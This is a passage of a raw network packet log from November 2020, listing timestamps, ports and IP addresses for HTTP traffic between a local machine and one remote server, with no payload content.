                                                                                                                                            Nov 23, 2020 12:19:09.910643101 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.910705090 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.910756111 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.910809040 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.910837889 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.910852909 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.910880089 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.910887003 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.910892963 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.910912037 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.910934925 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.910973072 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.911006927 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.911010981 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.911046982 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.911086082 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.950620890 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950691938 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950737000 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950777054 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950814962 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950851917 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950851917 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.950889111 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950892925 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.950927973 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.950928926 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.950983047 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.951006889 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.965806007 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.965900898 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.117736101 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.117820024 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.117825031 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.117870092 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.117882013 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.117908001 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.117928028 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.117949009 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.117955923 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.117989063 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.117994070 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.118036032 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.118036985 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.118079901 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.118081093 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.118118048 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.118128061 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.118161917 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158178091 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158236027 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158272982 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158298016 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158310890 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158334970 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158349991 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158365011 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158389091 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158405066 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158427954 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158440113 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158466101 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158476114 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158516884 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.158519983 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.158569098 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.172132015 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.172399998 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325139046 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325195074 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325229883 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325264931 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325273037 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325308084 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325313091 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325314999 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325320005 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325347900 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325376987 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325392008 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325404882 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325453997 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325469017 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325489998 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325505972 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325525045 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.325548887 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.325591087 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.365533113 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365588903 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365619898 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365658045 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365695000 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365721941 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.365732908 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365751982 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.365756035 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.365771055 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365801096 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.365808964 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.365813971 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.365869045 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.379184008 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.379364967 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.419534922 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.419601917 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.419717073 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.419780016 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532331944 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532392025 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532430887 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532469988 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532500029 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532506943 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532547951 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532553911 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532555103 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532558918 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532563925 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532598019 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532613039 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532635927 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532660961 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532674074 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532689095 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532713890 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.532725096 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.532771111 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.573115110 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.573174953 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.573214054 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.573235989 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.573254108 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.573272943 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.573278904 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.573292017 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.573299885 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.573332071 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.573348045 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.573373079 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.573398113 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.573421001 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.586724043 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.586977959 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.616780043 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.616837978 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.616890907 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.616925955 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.616980076 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.616986990 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.626827002 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.627038002 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.740683079 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.740742922 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.740791082 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.740803003 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.740843058 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.740849972 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.740855932 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.740905046 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.740910053 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.740959883 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.740959883 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.741009951 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.741013050 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.741056919 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.741060972 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.741105080 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.741112947 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.741153002 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.741189957 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.741236925 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.780651093 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.780704975 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.780761003 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.780806065 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.780827045 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.780857086 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.780870914 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.780878067 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.780881882 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.780913115 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.780916929 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.780962944 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.780978918 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.781023979 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.793682098 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.793773890 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.820533991 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.820636988 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.823606968 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.823648930 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.823700905 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.823721886 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.834249973 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.834358931 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.872385979 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.872499943 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.877928972 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.878025055 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.946778059 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.946835995 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.946892023 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.946949959 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.947004080 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.947009087 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.947051048 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.947052956 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.947058916 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.947063923 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.947098970 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.947123051 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.947149038 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.947160006 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.947208881 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.987726927 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.987787962 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.987821102 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:10.987957001 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.992942095 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:10.993205070 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:11.081012964 CET4973380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:11.253990889 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:11.400085926 CET804973347.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:11.865336895 CET804973347.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:11.865441084 CET4973380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:11.872756004 CET4973380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:12.177505016 CET804973347.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:13.591121912 CET4973780192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:13.591917992 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:13.859437943 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:13.859574080 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:13.860515118 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:13.862303972 CET804973747.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:13.862391949 CET4973780192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:14.167273045 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.887379885 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.887404919 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.887420893 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.887439013 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.887454987 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:14.887454987 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.887469053 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.887521029 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:14.931489944 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.931524992 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.931535959 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.931549072 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:14.931622982 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:14.931665897 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.154159069 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154186964 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154207945 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154226065 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154241085 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154243946 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.154257059 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154267073 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.154273987 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154289961 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154306889 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154314995 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.154323101 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154335976 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.154341936 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154359102 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.154360056 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.154381990 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.154413939 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.198400021 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.198431015 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.198446989 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.198462963 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.198477983 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.198481083 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.198513985 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.198545933 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.269067049 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.269100904 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.269118071 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.269138098 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.269212961 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.269234896 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421185970 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421248913 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421283007 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421298027 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421303034 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421340942 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421351910 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421377897 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421395063 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421430111 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421459913 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421502113 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421516895 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421540022 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421550989 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421578884 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421591043 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421617985 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421629906 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421655893 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421670914 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421694040 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421706915 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421731949 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421744108 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421780109 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421782970 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.421814919 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.421828985 CET4973880192.168.2.447.241.19.44
